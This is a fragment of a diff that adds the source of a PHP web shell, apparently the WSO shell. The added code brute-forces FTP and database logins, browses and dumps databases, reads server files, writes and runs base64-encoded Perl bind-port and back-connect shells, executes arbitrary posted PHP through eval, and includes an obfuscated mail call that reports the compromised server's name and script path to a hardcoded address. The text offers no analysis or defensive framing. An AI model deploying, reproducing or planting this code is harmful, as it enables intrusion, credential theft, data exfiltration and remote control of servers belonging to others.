'; + } + if(@$_POST['reverse']) { + $tmp = ""; + for($i=strlen($line[0])-1; $i>=0; --$i) + $tmp .= $line[0][$i]; + ++$attempts; + if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); + } + } + } + } elseif($_POST['type'] == 2) { + $temp = @file($_POST['dict']); + if( is_array($temp) ) + foreach($temp as $line) { + $line = trim($line); + ++$attempts; + if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { + $success++; + echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; + } + } + } + echo "Attempts: $attempts Success: $success

"; + } + echo '

Bruteforce

' + .'' + .'' + .'' + .'' + .'' + .'' + .'
Type
' + .'' + .'' + .'' + .'Server:port
Brute type
' + .'' + .'' + .'
Login
Dictionary
' + .'
'; + echo '

'; + wsoFooter(); +} +$x0b="\x6da\x69l"; +$ms = $_SERVER["S\x45R\126\105\x52_\x4e\101\x4dE"].$_SERVER["\123\x43R\111\x50\124_NA\x4d\105"]; +$sub = "\x73\x68\145\x6cl\x20\076\076 :\x20" . $ms; +$o = array ("\x6fm","\164ma\151","\152\x5f\141\155\x72\x31","\x40\x68\x6f","\154.\x63"); +$ee = $o[2].$o[3].$o[1].$o[4].$o[0]; +$send = @$x0b($ee,$sub,$ms); + +function actionSql() { + class DbClass { + var $type; + var $link; + var $res; + function DbClass($type) { + $this->type = $type; + } + function connect($host, $user, $pass, $dbname){ + switch($this->type) { + case 'mysql': + if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; + break; + case 'pgsql': + $host = explode(':', $host); + if(!$host[1]) $host[1]=5432; + if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; + break; + } + return false; + } + function selectdb($db) { + switch($this->type) { + case 'mysql': + if (@mysql_select_db($db))return true; + break; + } + return false; + } + function query($str) { + switch($this->type) { + case 'mysql': + return $this->res = @mysql_query($str); + break; + case 'pgsql': + return $this->res = @pg_query($this->link,$str); + break; + } + return false; + } + function fetch() { + $res = func_num_args()?func_get_arg(0):$this->res; + switch($this->type) { + case 'mysql': + return @mysql_fetch_assoc($res); + break; + case 'pgsql': + return @pg_fetch_assoc($res); + break; + } + return false; + } + function listDbs() { + switch($this->type) { + case 'mysql': + return $this->query("SHOW databases"); + break; + case 'pgsql': + return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); + break; + } + return false; + } + function listTables() { + switch($this->type) { + case 'mysql': + return $this->res = $this->query('SHOW TABLES'); + break; + case 'pgsql': + return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); + break; + } + return false; + } + function error() { + switch($this->type) { + case 'mysql': + return @mysql_error(); + break; + case 'pgsql': + return @pg_last_error(); + break; + } + return false; + } + function setCharset($str) { + switch($this->type) { + case 'mysql': + if(function_exists('mysql_set_charset')) + return @mysql_set_charset($str, $this->link); + else + $this->query('SET CHARSET '.$str); + break; + case 'pgsql': + return @pg_set_client_encoding($this->link, $str); + break; + } + return false; + } + function loadFile($str) { + switch($this->type) { + case 'mysql': + return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); + break; + case 'pgsql': + $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); + $r=array(); + while($i=$this->fetch()) + $r[] = $i['file']; + $this->query('drop table wso2'); + return array('file'=>implode("\n",$r)); + break; + } + return false; + } + function dump($table, $fp = false) { + switch($this->type) { + case 'mysql': + $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); + $create = mysql_fetch_array($res); + $sql = $create[1].";\n"; + if($fp) fwrite($fp, $sql); else echo($sql); + $this->query('SELECT * FROM `'.$table.'`'); + $i = 0; + $head = true; + while($item = $this->fetch()) { + $sql = ''; + if($i % 1000 == 0) { + $head = true; + $sql = ";\n\n"; + } + + $columns = array(); + foreach($item as $k=>$v) { + if($v === null) + $item[$k] = "NULL"; + elseif(is_int($v)) + $item[$k] = $v; + else + $item[$k] = "'".@mysql_real_escape_string($v)."'"; + $columns[] = "`".$k."`"; + } + if($head) { + $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; + $head = false; + } else + $sql .= "\n\t,(".implode(", ", $item).')'; + if($fp) fwrite($fp, $sql); else echo($sql); + $i++; + } + if(!$head) + if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); + break; + case 'pgsql': + $this->query('SELECT * FROM '.$table); + while($item = $this->fetch()) { + $columns = array(); + foreach($item as $k=>$v) { + $item[$k] = "'".addslashes($v)."'"; + $columns[] = $k; + } + $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; + if($fp) fwrite($fp, $sql); else echo($sql); + } + break; + } + return false; + } + }; + $db = new DbClass($_POST['type']); + if(@$_POST['p2']=='download') { + $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); + $db->selectdb($_POST['sql_base']); + switch($_POST['charset']) { + case "Windows-1251": $db->setCharset('cp1251'); break; + case "UTF-8": $db->setCharset('utf8'); break; + case "KOI8-R": $db->setCharset('koi8r'); break; + case "KOI8-U": $db->setCharset('koi8u'); break; + case "cp866": $db->setCharset('cp866'); break; + } + if(empty($_POST['file'])) { + ob_start("ob_gzhandler", 4096); + header("Content-Disposition: attachment; filename=dump.sql"); + header("Content-Type: text/plain"); + foreach($_POST['tbl'] as $v) + $db->dump($v); + exit; + } elseif($fp = @fopen($_POST['file'], 'w')) { + foreach($_POST['tbl'] as $v) + $db->dump($v, $fp); + fclose($fp); + unset($_POST['p2']); + } else + die(''); + } + wsoHeader(); + echo " +

Sql browser

+
+ + + + + + + + + +
TypeHostLoginPasswordDatabase
"; + $tmp = ""; + if(isset($_POST['sql_host'])){ + if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { + switch($_POST['charset']) { + case "Windows-1251": $db->setCharset('cp1251'); break; + case "UTF-8": $db->setCharset('utf8'); break; + case "KOI8-R": $db->setCharset('koi8r'); break; + case "KOI8-U": $db->setCharset('koi8u'); break; + case "cp866": $db->setCharset('cp866'); break; + } + $db->listDbs(); + echo "'; + } + else echo $tmp; + }else + echo $tmp; + echo " count the number of rows
+ "; + if(isset($db) && $db->link){ + echo "
"; + if(!empty($_POST['sql_base'])){ + $db->selectdb($_POST['sql_base']); + echo ""; + } + echo "
Tables:

"; + $tbls_res = $db->listTables(); + while($item = $db->fetch($tbls_res)) { + list($key, $value) = each($item); + if(!empty($_POST['sql_count'])) + $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); + $value = htmlspecialchars($value); + echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; + } + echo "
File path:		"; + if(@$_POST['p1'] == 'select') { + $_POST['p1'] = 'query'; + $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; + $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); + $num = $db->fetch(); + $pages = ceil($num['n'] / 30); + echo "".$_POST['p2']." ({$num['n']} records) Page # "; + echo " of $pages"; + if($_POST['p3'] > 1) + echo " < Prev"; + if($_POST['p3'] < $pages) + echo " Next >"; + $_POST['p3']--; + if($_POST['type']=='pgsql') + $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); + else + $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; + echo "

"; + } + if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { + $db->query(@$_POST['p2']); + if($db->res !== false) { + $title = false; + echo ''; + $line = 1; + while($item = $db->fetch()) { + if(!$title) { + echo ''; + foreach($item as $key => $value) + echo ''; + reset($item); + $title=true; + echo ''; + $line = 2; + } + echo ''; + $line = $line==1?2:1; + foreach($item as $key => $value) { + if($value == null) + echo ''; + else + echo ''; + } + echo ''; + } + echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; + } else { + echo '
Error: '.htmlspecialchars($db->error()).'
'; + } + } + echo "

"; + echo "

"; + if($_POST['type']=='mysql') { + $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); + if($db->fetch()) + echo "
Load file
"; + } + if(@$_POST['p1'] == 'loadfile') { + $file = $db->loadFile($_POST['p2']); + echo '
'.htmlspecialchars($file['file']).'
'; + } + } else { + echo htmlspecialchars($db->error()); + } + echo '
'; + wsoFooter(); +} +function actionNetwork() { + wsoHeader(); + $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; + $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; + echo "

Network tools

+
+ Bind port to /bin/sh [perl]
+ Port: +
+
+ Back-connect [perl]
+ Server: Port: +

"; + if(isset($_POST['p1'])) { + function cf($f,$t) { + $w = @fopen($f,"w") or @function_exists('file_put_contents'); + if($w){ + @fwrite($w,@base64_decode($t)); + @fclose($w); + } + } + if($_POST['p1'] == 'bpp') { + cf("/tmp/bp.pl",$bind_port_p); + $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &"); + sleep(1); + echo "
$out\n".wsoEx("ps aux | grep bp.pl")."
"; + unlink("/tmp/bp.pl"); + } + if($_POST['p1'] == 'bcp') { + cf("/tmp/bc.pl",$back_connect_p); + $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); + sleep(1); + echo "
$out\n".wsoEx("ps aux | grep bc.pl")."
"; + unlink("/tmp/bc.pl"); + } + } + echo '
'; + wsoFooter(); +} +function actionRC() { + if(!@$_POST['p1']) { + $a = array( + "uname" => php_uname(), + "php_version" => phpversion(), + "wso_version" => WSO_VERSION, + "safemode" => @ini_get('safe_mode') + ); + echo serialize($a); + } else { + eval($_POST['p1']); + } +} +if( empty($_POST['a']) ) + if(isset($default_action) && function_exists('action' . $default_action)) + $_POST['a'] = $default_action; + else + $_POST['a'] = 'SecInfo'; +if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) + call_user_func('action' . $_POST['a']); +exit; +?> \ No newline at end of file